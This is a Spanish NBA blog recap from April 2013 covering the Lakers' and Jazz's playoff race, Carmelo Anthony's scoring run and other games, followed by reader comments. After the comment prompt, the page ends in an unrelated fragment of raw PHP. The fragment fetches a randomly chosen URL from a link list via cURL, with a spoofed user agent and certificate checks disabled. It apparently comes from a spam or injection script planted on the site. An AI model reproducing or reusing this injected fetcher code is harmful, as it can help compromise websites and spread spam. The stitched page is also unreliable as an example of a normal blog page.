La Crónica: Lucha hasta el final

10 de April de 2013 por txusma

La lucha por los Playoffs continúa entre Lakers y Jazz. Hoy son los de Los Angeles los que duermen entre los 8 primeros de la conferencia oeste gracias a su victoria frente los Hornets y la derrota de los Jazz ante los Thunder. El protagonista del triunfo californiano fue, una vez más, Kobe Bryant. El escolta amarillo anotó 23 de sus 30 puntos en el último cuarto y prácticamente él sólo se impuso a los Hornets en ese último período (96-104). Eso sí, antes fue Pau Gasol el jugador clave que permitió que los Lakers continuaran en el partido y llegaran con opciones a los minutos finales. Ante los problemas de faltas de Howard y el mal partido que hasta el momento estaba jugando Bryant, fue el español el que asumió la responsabilidad y cuajó una de sus mejores actuaciones del año. Metta World Peace volvió a jugar 11 días después de una operación que en teoría le tenía que haber mantenido entre 4 y 6 semanas de baja. ¿Irresponsabilidad o compromiso? Por su parte, los Utah Jazz cayeron en casa ante los Thunder (90-80). Los de Oklahoma City cogieron 10 puntos de ventaja en la primera parte que fueron gestionando y manteniendo durante toda la segunda. Los Jazz se llegaron a poner a 4 puntos a falta de un minuto para el final pero entre Durant y Westbrook finiquitaron el partido. Con esta victoria los Thunder siguen en la pelea por el primer puesto de la conferencia. 

Los que ya tienen asegurada una posición en los Playoffs son Houston Rockets y Golden State Warriors, que ganaron sus compromisos respectivos. Los primeros lo hicieron frente los Phoenix Suns en un final surrealista. El partido llegó igualado a los segundos finales y James Harden se jugó un triple sobre la bocina. El balón rebotó en el aro pero Jermaine O’Neal, en la lucha por evitar el palmeo, tocó el balón cuando este se encontraba todavía sobre el cilindro del aro. ‘Goaltending’ claro y victoria tejana (98-101). Los Warriors, en cambio, no tuvieron ningún problema en vencer a los Wolves debido en buena parte a un partido infame de Ricky Rubio, que falló los 10 tiros que intentó (89-105). Klay Thompson fue el mejor de los suyos y Stephen Curry se pudo dedicar a tirar triples a ver si supera la marca de Ray Allen. Solo consiguió anotar 2, así que el reto se le pone más cuesta arriba.

En el Este poca emoción queda. Lo máximo que parece estar en juego es la quinta posición que se disputan Chicago y Atlanta, ya que la 4ª de los Nets parece inalcanzable quedando tan pocos partidos de liga regular. Anoche, unos Bulls plagados de bajas perdieron ante Toronto en un partido en que los Raptors parecieron jugar al ratón y al gato; se fueron de 15 en el primera parte pero llegaron sólo 4 arriba al descanso; en el tercer cuarto se fueron de 16 pero se llegó virtualmente empatados a los segundos finales. En la última jugada del partido, un choque de Rudy Gay con Jonas Valanciunas provocó que este tuviera que ser retirado en camilla con problemas en el cuello. Por su parte, Brooklyn venció muy cómodamente a los Sixers gracias a un primer cuarto brutal de la pareja Evans-Lopez (83-104). Memphis también se impuso fácilmente a Charlotte y ya encadenan 13 victorias consecutivas en casa (75-94).

Los 3 mejores equipos de la conferencia Este también jugaron y sacaron adelante sus respectivos partidos. Los Heat se impusieron a los Bucks en un aperitivo de lo que puede ser la primera ronda de playoffs a pesar de no contar con Wade ni Bosh (83-94); los Pacers sudaron más de lo previsto y tuvieron que remontar 20 puntos en el último cuarto para doblegar a los Cavs (94-99); y los Knicks vencieron a los Wizards gracias a un tremendo acierto desde la línea de 3 (20 triples de 36 intentos) y con nueva exhibición de Carmelo que se fue a los 36 puntos (99-120). El alero de los Knicks está acabando pletórico la liga regular y ya lleva 5 partidos consecutivos por encima de los 36 puntos con un 50% de acierto en el tiro. Lo nunca visto desde Karl Malone.

PREMIOS

MVP: Carmelo Anthony un día más. Como hemos dicho antes, 5º partido consecutivo por encima de los 36 puntos y el 50% de acierto en el tiro. Ayer, además, cogió 8 rebotes y repartió 6 asistencias. Con este Carmelo los Knicks aspiran a todo.

Rookie: Buen partido de Anthony Davis ante Gasol y Howard. El rookie consiguió 18 puntos y 14 rebotes.

Sorpresa: Jimmy Butler se está reivindicando ante la plaga de lesiones de los Bulls. Está jugando casi todo los minutos de los partidos y deja buenas actuaciones. La de ayer es un ejemplo: 28 puntos y 7 rebotes en 48 minutos. Otro que pasa por una gran momento es Reggie Evans que anotó 17 puntos y capturó 24 rebotes. Jon Leuer apareció de la nada para anotar 11 puntos sin falló y capturar 5 rebotes en 12 minutos.

Decepción: Ricky Rubio falló los 10 tiros a canasta que intentó pero al menos aportó en otras facetas del juego. Thaddeus Young ni eso, 3 puntos con un 1-9 en tiros de campo.

Esfuerzo en vano: Aparte del de Jimmy Butler, tenemos el de Brandon Jennings que tuvo que ver como sus 30 puntos no servían para ganar su partido.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

19 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Me tomo la libertad de pegar aquí mis comentarios de anoche, ya que son de esta jornada:

    Lakers vuelve a depender de sí mismo para entrar en PO. Mirando el boxscore, Pau 0 faltas… me ha sorprendido.

    En cuanto a los records de liga y tal:
    – Ricky un sólo robo. (0-10 en TC madre…)
    – Curry sólo 2 triples

      Citar

  2. Jose Luis dice:
    #2

    Y el partido, pues lo que son estos Lakers… ganando con mucho esfuerzo a unos Hornets que nunca han perdido la cara y que han contado con un buen Eric Gordon hasta el último cuarto donde se ha diluido un poco. Gasol ayudó en el 3er cuarto para mantenerse en el partido y Kobe abrió on-fire el 4º, igualaron los Hornets pero de nuevo de la mano de Kobe y algunos posteos de Pau (hay uno que cae y mantiene bote, dando asistencia a Jamison, ¡crack!), cogieron ventaja los Lakers para no perderla en los instantes finales.

    PD: Por cierto, con 6 arriba, y a falta de 2:16, va Howard y comete Inbound Turnover… saca de fondo pisando, y bola Hornets…

    PD2: 23 puntos Kobe en el último cuarto… ha acabado con 41 minutos (¡SÓLO!), 7-11 T2, 2-7 T3, 10-11FT, 6 rebotes, 6 asistencias, 5 pérdidas, 5 robos y 1 tapón. Pau y Howard muy bien también, y Jamison ha aportado bien desde el banquillo.

    PD3: La vuelta de MWP, 11 días después de haberse operado el menisco, dándole 4-6 semanas de baja… demencial, qué jugador, qué esfuerzo en su recuperación.

      Citar

  3. Ruxixón dice:
    #3

    A mí el final de temporada de los Knicks,y el de Melo en particular,me parece brutal pero esa mística sobre NYK en los momentos de la verdad hace que dude de ellos,sobre todo en una serie contra los Celtics.¿Tan indefendible será Carmelo en PO?He ahí mi duda.

      Citar

  4. GreenPride dice:
    #4

    Pues los Lakers vuelven a entrar en PO gracias a Oklahoma y ahora ya no deberían salir de ahí. Les queda jugar en Portland y tres partidos en casa contra equipos de PO (Rockets, Warriors y Spurs). Quitando el de los Spurs lo demás deberían ser victorias sí o sí lo que deja a los Jazz teniendo que ganar sus tres y esperar el fallo de los de LA. En teoría los dos contra Wolves son asequibles pero el úlitmo en Memphis con unos Grizzlies que pueden estar jugandose el tercer puesto de la conferencia o incluso la ventaja de campo debería ser muy complicado. Así las cosas y sin estar decidido ahora hay que ser un punto optimista con los Lakers.
    Además en estos últimos partidos los Lakers disfrutan del mejor Gasol del curso y siguen con un Bryant sublime y un Howard mejorado respecto al resto del año. Yo creo que van a llegar a PO y si su rival es San Antonio incluso podrían tener una serie muy interesante y con opciones (si es con OKC yo no les doy opción).
    Del resto interesante la gran forma de Melo y los Knicks y la eliminatoria Knicks-Celtics que vistos los records y el estado a día de hoy de ambos debería ser clara para los de New York pero a mí me pasa como a Ruxixón y veo una eliminatoria de lo más interesante…

      Citar

  5. MagicJohnson32 dice:
    #5

    Gasol sostuvo anoche a los Lakers hasta que apareció Bryant, que entonces ganó el partido con un último cuarto de escándalo. Como decís, estamos viendo el mejor Pau en mucho tiempo. Llega muy tarde pero tal vez no demasiado.

    Me me fío nada del partido de esta noche Lakers-Blazers. Kobe y Pau acabaron muy cansados anoche y los Lakers este año han sido penosos en back-to-backs. Además, ya sabemos que Portland se les da fatal y los Blazers, aunque no se jueguen nada, siempre salen hiper motivados contra LAL.

      Citar

  6. Jose Luis dice:
    #6

    Penosos no Magic… es que no han ganado ningún back-to-back completo!

    Esta noche debe ser el primero (y útlimo) sí o sí. Batum y Hickson son duda, y Matthews está fuera

      Citar

  7. rumbero dice:
    #7

    Jose Luis:
    Penosos no Magic… es que no han ganado ningún back-to-back completo!

    Esta noche debe ser el primero (y útlimo) sí o sí. Batum y Hickson son duda, y Matthews está fuera

    Pues si estos no juegan y con ese pedazo de banquillo Blazer es la ocasión para no acabar con un rosco.

    Hiendo al enemigo y viendo un poco el Utah-Oklahoma, muy cómodos los Thunder durante todo el partido a pesar que los Jazz se llegaron a poner a 7 a falta de poco. La parejita de OKL se bastó para liquidarlos como suele ser habitual. A 1 asistencia se quedó Durant del triple doble. Igual hasta quieren acabar primeros.
    En Utah poca tensión para lo que se estan jugando, pero igual es que no les da para más. Encima partido de los malos para Millsap que no pudo con Ikea y Mo que a pesar de su 19/6 hizo alguna de las suyas. No parece que sea el director de juego que necesitan los Jazz. No se si volverá a sonar fuerte Calde para la temporada que viene

      Citar

  8. rumbero dice:
    #8

    Perdón por las retinas quemadas con mi “hiendo”. Es que en mi teclado está la “Hi” al lado de la “y” 😀
    Me cortare un meñique para recordarme que no vuelva a ocurrir

      Citar

  9. MagicJohnson32 dice:
    #9

    Jose Luis:
    Penosos no Magic… es que no han ganado ningún back-to-back completo!

    Lo que decía, penoso, jeje.

    Sí, los Blazers andan justísimos y dicen que incluso podrían salir con cuatro rookies: Lillard, Barton, Claver y Leonard.

      Citar

  10. Jose Luis dice:
    #10

    Batum es baja segura también.

      Citar

  11. Denise dice:
    #11

    MagicJohnson32:

    Me me fío nada del partido de esta noche Lakers-Blazers. Kobe y Pau acabaron muy cansados anoche y los Lakers este año han sido penosos en back-to-backs. Además, ya sabemos que Portland se les da fatal y los Blazers, aunque no se jueguen nada, siempre salen hiper motivados contra LAL.

    Joer Magic, vaya canguelo, los Blazers van a ser Aldridge y cuatro amiguetes, entre ellos el protagonista de Homeland, Victor Claver.

      Citar

  12. Denise dice:
    #12

    GreenPride:
    í lo que deja a los Jazz teniendo que ganar sus tres y esperar el fallo de los de LA. En teoría los dos contra Wolves son asequibles pero el úlitmo en Memphis con unos Grizzlies que pueden estar jugandose el tercer puesto de la conferencia o incluso la ventaja de campo debería ser muy complicado.

    Los Wolves son un equipo que pese a su mal record, tiene a muy buenos jugadores y no creo que los Jazz ganen facilmente a Minny, incluso diría que éstos se van a llevar algun partido. Yo comparo el roster de Wolves (aun sin Kevin Love) y el de Jazz, y no sabría decirte cual tiene mejor equipo.

      Citar

  13. nba dice:
    #13

    No se , pero yo no veo nada claro que Lakers se vaya a llevar algo positivo de portland.Pongamos en situacion, se van a enfrentar a un equipo en su casa, despues de haber jugado ayer noche y que entre su quinteto titular esta el ROY, así como uno de los mejores 4 PF’s de este año, así como un tio luchador como Hickson …
    Ya solo de pensar que contra portland fue donde empezo a torcerse la temporada para Lakers, ya me pongo malo.
    Alguien piensa que los rivales que tiene Lakers no van a salir hipermotivados para evitar que lleguen a playoffs

      Citar

  14. MagicJohnson32 dice:
    #14

    Denise: Joer Magic, vaya canguelo…

    No lo sabes tú bien…

      Citar

  15. Denise dice:
    #15

    nba:
    No se , pero yo no veo nada claro que Lakers se vaya a llevar algo positivo de portland.Pongamos en situacion, se van a enfrentar a un equipo en su casa, despues de haber jugado ayer noche y que entre su quinteto titular esta el ROY, así como uno de los mejores 4 PF’s de este año, así como un tio luchador como Hickson …
    Ya solo de pensar que contra portland fue donde empezo a torcerse la temporada para Lakers, ya me pongo malo.
    Alguien piensa que los rivales que tiene Lakers no van a salir hipermotivados para evitar que lleguen a playoffs

    Hickson y Batum probablemente ni jueguen. Según comentó hace 2 horas el periodista Chris Haynes en su Twitter, Batum y Matthews no jugarán, Aldridge está enfermo pero es probable que juegue, y Hickson está tocado de la espalda y su concurso en el partido lo decidirán antes de empezar el partido.

    “F LaMarcus Aldridge (sick) is probable and F JJ Hickson (back) is a gametime decision vs Lakers.
    G Wesley Matthews (ankle) F Nicolas Batum (shoulder) are out tonight vs Lakers.”

    Es decir, si esta noche Gasol y Howard no hacen entre los dos 50 puntos y 25 rebotes ante una pintura de los Blazers muy mermada, apaga y vamonos…

      Citar

  16. Jose Luis dice:
    #16

    Habrá que levantarse para verlo 😀 ¿alguien por aquí a las 4 de la noche?

      Citar

  17. Denise dice:
    #17

    Jose Luis:
    Habrá que levantarse para verlo ¿alguien por aquí a las 4 de la noche?

    Por mi parte, no. Con lo barato que se ha puesto el despido y el paro que hay, uno ya no puede llegar con ojeras y medio drogui al trabajo.
    Una mala noticia para Jazz, después de las pruebas medicas efectuadas hoy a Kanter, el turco se pierde éstos últimos partidos por lesión en el hombro izquierdo.

      Citar

  18. AndiD dice:
    #18

    En serio? Hacía falta que se cascase los 48 minutos Kobe? D’Antoni…
    Esots Lakers son carne de 4-0.

      Citar

  19. Jose Luis dice:
    #19

    Yo me espero a la crónica para comentar y así ordeno los pensamientos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>